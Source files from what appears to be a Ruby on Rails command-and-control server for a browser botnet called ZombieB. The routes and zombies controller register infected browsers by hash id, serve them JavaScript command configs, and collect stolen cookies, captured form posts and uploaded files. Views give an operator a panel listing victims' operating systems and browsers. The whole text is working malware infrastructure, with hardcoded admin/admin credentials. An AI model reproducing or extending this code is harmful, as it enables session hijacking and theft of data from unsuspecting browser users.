full/server/ZombieB/config/routes.rb
ZombieB::Application.routes.draw do
  resources :file
  resources :upload
  match 'postinfos/removeall' => 'postinfos#removeall'
  resources :postinfos
  match 'cookies/removeall' => 'cookies#removeall'
  resources :cookies
  resources :ccconfigs
  resources :zombies do
	resources :ccconfigs
	resources :cookies 
	resources :postinfos
  end

  match 'c/:hashid' => 'zombies#conf'
  match 'login/:hashid' => 'zombies#login'
  match 'addcookie/:hashid' => 'cookies#new_fromhash'
  match 'addpostinfo/:hashid' => 'postinfos#new_fromhash'
  match 'upload/:hashid' => 'zombies#upload' 
  match 'extensions' => 'extensions#show' 
  match 'ccconfigs/:id/demo' => 'ccconfigs#demo', :as=>:demo

   root :to => 'zombies#index'

end

full/server/ZombieB/app/controllers/zombies_controller.rb
class ZombiesController < ApplicationController
http_basic_authenticate_with :name => "admin", :password => "admin", :except => [:conf, :upload, :login, :show]

  # GET /zombies
  # GET /zombies.json
  def index
    @zombies = Zombie.where(['id <> ?', 1]).order("updated_at desc")

    respond_to do |format|
      format.html # index.html.erb
      format.json { render json: @zombies }
    end
  end

  # show the config for the zombie browsers
  def conf
    @zombie = Zombie.where(:hashid => params[:hashid]).first
	@ccconfig = @zombie.ccconfig
	@zombie.lastseen = Time.now
	@zombie.save
    respond_to do |format|
      format.json { render json: @ccconfig }
    end
  end
  
  # GET /zombies/1
  # GET /zombies/1.json
  def show
    @zombie = Zombie.find(params[:id])
	@ccconfig = @zombie.ccconfig
	
    respond_to do |format|
      format.html # show.html.erb
      format.json { render json: @zombie }
    end
  end

  # GET /zombies/new
  # GET /zombies/new.json
  def new
    @zombie = Zombie.new

    respond_to do |format|
      format.html # new.html.erb
      format.json { render json: @zombie }
    end
  end

  # GET /zombies/1/edit
  def edit
    @zombie = Zombie.find(params[:id])
  end

  # POST /zombies
  # POST /zombies.json
  def create
    @zombie = Zombie.new(params[:zombie])
    respond_to do |format|
      if @zombie.save
        format.html { redirect_to @zombie, notice: 'Zombie was successfully created.' }
        format.json { render json: @zombie, status: :created, location: @zombie }
      else
        format.html { render action: "new" }
        format.json { render json: @zombie.errors, status: :unprocessable_entity }
      end
    end
	@zombie_def = Zombie.find(1)
	@ccconfig = @zombie_def.ccconfig.dup
	@ccconfig.jscommandid = 1
	@ccconfig.zombie_id = @zombie.id
	@ccconfig.save
  end

  # PUT /zombies/1
  # PUT /zombies/1.json
  def update
    @zombie = Zombie.find(params[:id])

    respond_to do |format|
      if @zombie.update_attributes(params[:zombie])
        format.html { redirect_to @zombie, notice: 'Zombie was successfully updated.' }
        format.json { head :no_content }
      else
        format.html { render action: "edit" }
        format.json { render json: @zombie.errors, status: :unprocessable_entity }
      end
    end
  end

  # DELETE /zombies/1
  # DELETE /zombies/1.json
  def destroy
    @zombie = Zombie.find(params[:id])
    @zombie.destroy

    respond_to do |format|
      format.html { redirect_to zombies_url }
      format.json { head :no_content }
    end
  end

  def upload
	  @zombie = Zombie.where(:hashid => params[:hashid]).first
	  uploaded_io = params[:datafile]
	  url = @zombie.ccconfig.jscommand.match(/\(.*?"([^\,]*)".*\)/)[1]
	  filename = url.split('/').pop().split('?')[0]
	  filename += "." + (0...10).map{ ('a'..'z').to_a[rand(26)] }.join
	  file = File.open(Rails.root.join('public', 'uploads', filename), 'wb')
      file.write(uploaded_io.read)
  end
  
  def login
	@zombie = Zombie.where(:hashid => params[:hashid]).first
	if !(@zombie)
		@zombie = Zombie.new(params[:zombie])
		@zombie.hashid = params[:hashid]
		@zombie.save
		@zombie_def = Zombie.find(1)
		@ccconfig = @zombie_def.ccconfig.dup
		@ccconfig.jscommandid = 1
		@ccconfig.zombie_id = @zombie.id
		@ccconfig.save
	else 
		respond_to do |format|
		  if @zombie.update_attributes(params[:zombie])
			format.all {render :nothing => true, :status => 200, :content_type => 'text/html'} 
			#format.json { head :no_content }
		  #else
			#format.html { render action: "edit" }
			#format.json { render json: @zombie.errors, status: :unprocessable_entity }
		  end		
		end
	end	
	@mybrowser = request.env["HTTP_USER_AGENT"] 
	case @mybrowser 
		 when /Windows NT 6.1/ then @zombie.os = "Windows NT 6.1" 
		 when /Linux/ then @zombie.os = "Linux" 
		 when /OS X/ then @zombie.os = "apple" 
		 when /Android/ then @zombie.os = "android" 
		 when /CrOS/ then @zombie.os = "ChromeOS" 
	end
	logger.info " useragent: " + @mybrowser
	case @mybrowser 
		 when /Chrome/ then
		 @temp = @mybrowser[/Chrome\/([\d\.]*)/]
		 @zombie.browserversion = @temp
		 logger.info "temp: " + @temp
		 logger.info "chromeversion: " + @zombie.browserversion
		 @zombie.save	
		 when /Safari/ then
		 @temp = @mybrowser[/Safari\/([\d\.]*)/]
		 @zombie.browserversion = @temp
		 logger.info "temp: " + @temp
		 logger.info "safariversion: " + @zombie.browserversion
		 @zombie.save	
	end		
	@zombie.save
  end
end  

full/server/ZombieB/app/helpers/zombies_helper.rb
module ZombiesHelper
end

full/server/ZombieB/app/views/zombies/_form.html.erb
<%= form_for(@zombie) do |f| %>
  <% if @zombie.errors.any? %>
    <div id="error_explanation">
      <h2><%= pluralize(@zombie.errors.count, "error") %> prohibited this zombie from being saved:</h2>

      <ul>
      <% @zombie.errors.full_messages.each do |msg| %>
        <li><%= msg %></li>
      <% end %>
      </ul>
    </div>
  <% end %>

  <div class="field">
    <%= f.label :username %><br />
    <%= f.text_field :username %>
  </div>
  <div class="field">
    <%= f.label :os %><br />
    <%= f.text_field :os %>
  </div>
  <div class="field">
    <%= f.label :browsername %><br />
    <%= f.text_field :browsername %>
  </div>
  <div class="field">
    <%= f.label :browserversion %><br />
    <%= f.text_field :browserversion %>
  </div>
    <div class="field">
    <%= f.label :hashid %><br />
    <%= f.text_field :hashid %>
  </div>
  <div class="field">
    <%= f.label :lastseen %><br />
    <%= f.datetime_select :lastseen %>
  </div>
  <div class="actions">
    <%= f.submit %>
  </div>
<% end %>

full/server/ZombieB/app/views/zombies/edit.html.erb
<h1>Editing zombie</h1>

<%= render 'form' %>

<%= link_to 'Show', @zombie %> |
<%= link_to 'Back', zombies_path %>

full/server/ZombieB/app/views/zombies/index.html.erb
<h1>Listing zombies</h1>

<table>
  <tr>
    <th>Username</th>
    <th>Os</th>
    <th>Browser</th>
    <th>Browserversion</th>
    <th>Updated at</th>
    <!-- <th>Hashid</th>   -->
    <th></th>
    <th></th>
    <th></th>
    <th></th>
  </tr>

<% even_odd = 0 
@zombies.each do |zombie| 
even_odd = 1 - even_odd
%>

  <tr class="background<%= even_odd %>">
    <td><%= zombie.username %></td>
    <td><%= image_tag zombie.os + ".png" %> </td>
    <td><%= image_tag zombie.browsername + ".png" %> </td>
    <td><%= zombie.browserversion %></td>
    <td><%= zombie.updated_at %></td>
    <!-- <td><%= zombie.hashid %></td>   -->
    <td><%= link_to 'Show', zombie %></td>
    <td><%= link_to 'Edit zombie', edit_zombie_path(zombie) %></td>
    <td><%= link_to 'Edit config', edit_ccconfig_path(zombie.ccconfig) %></td>
    <td><%= link_to 'Demo', {:controller => "ccconfigs", :action => "demo", :id => zombie.ccconfig.id } %></td>
    <td><%= link_to 'Destroy', zombie, :data => {confirm: 'Are you sure?'}, method: :delete %></td>
  </tr>
<% end %>
</table>

<br />

<%= link_to 'New Zombie', new_zombie_path %>|
<%= link_to 'Destroy all cookies', cookies_removeall_path %>|
<%= link_to 'Destroy all postinfo', postinfos_removeall_path %>|

full/server/ZombieB/app/views/zombies/new.html.erb
<h1>New zombie</h1>

<%= render 'form' %>

<%= link_to 'Back', zombies_path %>

full/server/ZombieB/app/views/zombies/show.html.erb
<p id="notice"><%= notice %></p>

<p>
  <b>Username:</b>
  <%= @zombie.username %>
</p>

<p>
  <b>Os:</b>
  <%= @zombie.os %>
</p>

<p>
  <b>Browsername:</b>
  <%= @zombie.browsername %>
</p>

<p>
  <b>Browserversion:</b>
  <%= @zombie.browserversion %>
</p>

<p>
  <b>Last updated:</b>
  <%= @zombie.updated_at %>
</p>

<p>
  <b>Hashid:</b>
  <%= @zombie.hashid %>
</p>
<br/>

<%= link_to 'Edit zombie', edit_zombie_path(@zombie) %> |
<%= link_to 'Back', zombies_path %>

<br/>

<%= render "ccconfigs/index_zombie" %>
<%= render "cookies/index_zombie" %>
<%= render "postinfos/index_zombie" %>

<br/>

full/server/ZombieB/app/views/zombies/upload.html.erb
test